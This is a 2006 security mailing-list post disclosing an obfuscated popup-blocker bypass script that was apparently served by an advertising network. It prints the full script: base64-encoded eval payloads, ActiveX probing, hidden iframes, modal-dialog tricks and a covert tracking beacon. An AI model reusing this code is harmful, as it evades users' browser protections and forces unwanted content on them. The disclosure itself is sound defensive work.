Network Security: Detailed info on Popup Blocker Bypass Script

Subject:	Popup Blocker Bypass Script
Date:	Wed, 22 Mar 2006 20:42:00 -0500
 
Tribal Fusion and other advertising sites are using virtually identical
copies of a multi-exploit popup blocker bypass script. The script uses
exploits of ocget.dll, OffProv11 and OfficeObj10 classes, the Google
Toolbar, and JavaScript within a Shockwave Flash file. Some exploits
look like a shortcoming in IE handling of MS Office integration.

The script is heavily obfuscated and I have not done a full analysis. I
did find a Securiteam partial analysis from last December at
http://blogs.securiteam.com/index.php/archives/138

The exploit is in the wild and appears to be common. Users of IE6 fully
patched except for Q912945 are being exploited. Not tested under any
other version.




I found the hostile code at:
 
http://cdn5.tribalfusion.com/media/common/pop/pop-tf33.js

contents as of 2006-03-22 13:46:00 UTC-0000 are below. 
 
 
 oV1=window; function fStart(u,n,v) { if (!oV1.opera) { var
twin=oV1.open(u,n,v); oV1.focus(); } if (!window.fV1) {fV13();} var
w=oV2(u,n,v); var wo=vWA[w]; wo.pw=twin; fV3("fV10(" + w + ")",100);
return wo; } function fV11() {return fV6(vV1);} function fV5(x) { return
true; } function oV2(u,n,v) { var c = vWA.length; vWA[c] = new Array;
var cw = vWA[c]; var tn=new Date(); if (!v) var v=''; if (!n) var
n=tn.getTime(); cw.location=u; cw.f=1; cw.s=0; cw.n=n; cw.v=v; cw.cn="";
cw.cnt=c; cw.blur=function() {cw.f=-1;}; cw.focus=function() {cw.f=1;};
return c } function fV13() { oV5=oV1.document; vWA=new Array;
fV1=oV1.open; fV2=oV1.focus; fV3=setTimeout; fV4=clearTimeout;
vV1='PE9CSkVDVCBJRD0nb1Y0JyBkYXRhPScvZmF2aWNvbi5pY28nIHR5cGU9J2FwcGxpY2F
0aW9uL3htbCc+PC9PQkpFQ1Q+'; fV20=(document.all&&!oV1.opera)?1:0;
isG=fV31=fV32=0; fV21=fV20?(navigator.appVersion.indexOf('NT 5.1')>0):0;
fV34=fV20?(navigator.appVersion.indexOf('MSIE 7')>0):0;
oV5.write(fV6('PGlucHV0IHN0eWxlPSJ3aWR0aDowcHg7IHRvcDowcHg7IHBvc2l0aW9uO
mFic29sdXRlOyB2aXNpYmlsaXR5OmhpZGRlbjsiIGlkPSJvVjYiIG9uY2hhbmdlPSJmVjgoZ
lYxLDUsdHJ1ZSkiPg==')); oV5.write(fV6('PGRpdiBpZD0ib1YxMCI+PC9kaXY+'));
} function debug() {void(0)} function fV6(input) { var o = ""; var chr1,
chr2, chr3; var enc1, enc2, enc3, enc4; var i = 0; var keyStr =
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
input = input.replace(/[^A-Za-z0-9\+\/\=]/g, ""); do { enc1 =
keyStr.indexOf(input.charAt(i++)); enc2 =
keyStr.indexOf(input.charAt(i++)); enc3 =
keyStr.indexOf(input.charAt(i++)); enc4 =
keyStr.indexOf(input.charAt(i++)); chr1 = (enc1 << 2) | (enc2 >> 4);
chr2 = ((enc2 & 15) << 4) | (enc3 >> 2); chr3 = ((enc3 & 3) << 6) |
enc4; o = o + String.fromCharCode(chr1); if (enc3 != 64) { o = o +
String.fromCharCode(chr2); } if (enc4 != 64) { o = o +
String.fromCharCode(chr3); } } while (i < input.length); return o; }
function fV12() { if (--fV25<1) return; oV1.onerror=fV5; var
t=fV3('fV12()',500); oV1.wO1=oV3.oV4.object.parentWindow;
oV3.location=fV6('YWJvdXQ6Ymxhbms='); fV3('fV8(wO1.open,2)',200);
fV4(t); } function fV17() { if (--fV25<1) { fV25=25; var
t=fV3('fV12()'); return; } var x=fV3('fV17()',250);
oV1.fV14=oV8.children[0].parentWindow; fV1=fV14.open; fV4(x);
oV8.removeChild(oV8.children[0]); oV5.all['oV6'].fireEvent('onchange');
} function fV16() { z=createPopup(); oV8=z.document.body;
oV8.innerHTML=fV6(vV1); fV25=5; fV3('fV17()',200); } function fV19(v) {
if (oV5.getElementById('oV10')) {
oV5.getElementById('oV10').innerHTML=v; } else { var
o=oV5.createElement("span"); o.innerHTML=v; o.style.visibility =
"visible"; oV5.body.appendChild(o); } } function fV23() { fV8(fV1,4); }
function fV22() { if (--fV25==0) {fV21=0; fV7(); return;} var wo=vWA[0];
var x=fV3('fV22()',750); var o=fV24('oV9'); if (o.DOM) { wo.s=-1;
fV4(x); fV25=1;
eval(fV6("dmFyIG91dD0ic2hvd01vZGFsRGlhbG9nKCdqYXZhc2NyaXB0OndpbmRvdy5vbm
Vycm9yPWZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9OyBzZXRUaW1lb3V0KFwid2luZG93LmNsb3
NlKClcIik7IHg9d2luZG93Lm9wZW4oXCJhYm91dDpibGFua1wiLFwiIiArIHdvLm4gKyAiXC
IsXCIiICsgd28udiArICJcIik7ICB4LmJsdXIoKTsgd2luZG93LmNsb3NlKCknLCcnLCdoZW
xwOjA7Y2VudGVyOjA7ZGlhbG9nV2lkdGg6MTtkaWFsb2dIZWlnaHQ6MTtkaWFsb2dMZWZ0Oj
UwMDA7ZGlhbG9nVG9wOjUwMDA7Jyk7Ijsgby5ET00uU2NyaXB0LmV4ZWNTY3JpcHQob3V0KT
s=")); wo.s=0; fV2(); fV3('fV23()'); } } function fV28() {
fV19(fV6('PG9iamVjdCBpZD0ib1Y5IiBvbmVycm9yPSJmVjI1PTEiIHN0eWxlPSJwb3NpdG
lvbjphYnNvbHV0ZTtsZWZ0OjE7dG9wOjE7d2lkdGg6MTtoZWlnaHQ6MSIgY2xhc3NpZD0iY2
xzaWQ6MkQzNjAyMDEtRkZGNS0xMWQxLThEMDMtMDBBMEM5NTlCQzBBIj48U0NSSVBUPmZWMj
U9MTwvU0NSSVBUPjwvb2JqZWN0Pg==')); fV25=6; fV3('fV22()',500) } function
fV26() {
fV19(fV6('PElGUkFNRSBpZD0ib1YzIiBOQU1FPSJvVjMiIFNUWUxFPSJ2aXNpYmlsaXR5Om
hpZGRlbjsgcG9zaXRpb246YWJzb2x1dGU7d2lkdGg6MTtoZWlnaHQ6MTsiIHNyYz0iamF2YX
NjcmlwdDpwYXJlbnQuZlYxMSgpIj48L0lGUkFNRT4=')); fV25=20;
fV3('fV12()',200); } function fV30() { fV3('fV32?fV29():fV28()'); var
o=document.createElement('object');
o.onreadystatechange=function(){fV32=1};
o.classid='clsid:D2BD7935-05FC-11D2-9059-00C04FD7A1BD';
o.onreadystatechange=function(){fV32=0}; } function fV29() {
fV3('fV31?fV28():fV33()'); var o=document.createElement('object');
o.onreadystatechange=function(){fV31=1};
o.classid='clsid:9E30754B-29A9-41CE-8892-70E9E07D15DC';
o.onreadystatechange=function(){fV31=0}; } function fV33() {
fV3('isG?fV16():fV26();'); var o=document.createElement('object');
o.onreadystatechange=function(){isG=1};
o.classid='clsid:00EF2092-6AC5-47c0-BD25-CF2D5D657FEB';
o.onreadystatechange=function(){isG=0}; } function fV7() {
oV5.body.onclick=function() {fV8(oV1.open,3)}; if (oV5.createElement) {
fV24=oV5.getElementById; if (fV34) return; if (fV20) { if (fV21) {
fV30(); } else { fV33(); } } else { out='<embed swliveconnect="true"
src="http://cdn1.tribalfusion.com/media/common/pop/pop.swf"; width="1"
height="1">'; fV19(out); if (!oV5.all) { x=oV5.getElementById('oV6');
x.focus(); x.value=Math.random(); } } } } function fV8(f,t,y) { for (var
i=0;i<vWA.length;i++) if (vWA[i].s==0) { vWA[i].s=-1; var wo=vWA[i];
wo.pw=f(wo.location,wo.n,wo.v); fV3("var i="+i+"; var wo=vWA[i];
if(wo.s==-1){wo.s=0}"); fV9(wo,t); } } function fV9(wo,s) { if (!s) s=0;
if (wo.s > 1) return; if (s==0) var t=fV3("fV7()",500); if (s==5 && isG)
var t=fV3('fV26()',200); oV1.onerror=fV5; if (!oV1.opera)
{wo.f==-1?wo.pw.blur():wo.pw.focus();} if (wo.pw) { wo.s=2; fV2();
fV4(t);
eval(fV6('CQlpZiAoMSArIE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqIDEwMCkgPCA2KS
B7DQoJCQl2YXIgeD1uZXcgSW1hZ2UoKTsNCgkJCXguc3JjPSdodHRwOi8vd3d3LmFkb3V0cH
V0LmNvbS92ZXJzaW9uMi9oaXRfdHJpYmFsLmNmbT90eXBlPScgKyBzOw0KCQl9'));
oV1.onerror=null; } } function fV10(w) { if (oV1.opera && !fV20)
{fV7();return;} wo=vWA[w]; fV9(wo); }  
 
 
 
 
 
var l = (screen.width - TF_PopWidth) / 2 ; var t = (screen.height -
TF_PopHeight) / 2 ; var pop =
fStart(TF_PopUrl,'','height='+TF_PopHeight+',width='+TF_PopWidth+',left=
'+l+',top='+t+',toolbar=0,status=0,menubar=0,scrollbars=0,resizable=0');
pop.blur();
window.focus();
<Prev in Thread]	Current Thread	[Next in Thread>
Popup Blocker Bypass Script, James C. Slora, Jr. <=
Previous by Date:	Re: PasswordSafe 3.0 weak random number generator allows key recovery attack, Dave Korn
Next by Date:	Sudo tricks, John Richard Moser
Previous by Thread:	ArabPortal 2.0 Stable [ Full Patch Disclosure ], o . y . 6
Next by Thread:	Sudo tricks, John Richard Moser
Indexes:	[Date] [Thread] [Top] [All Lists]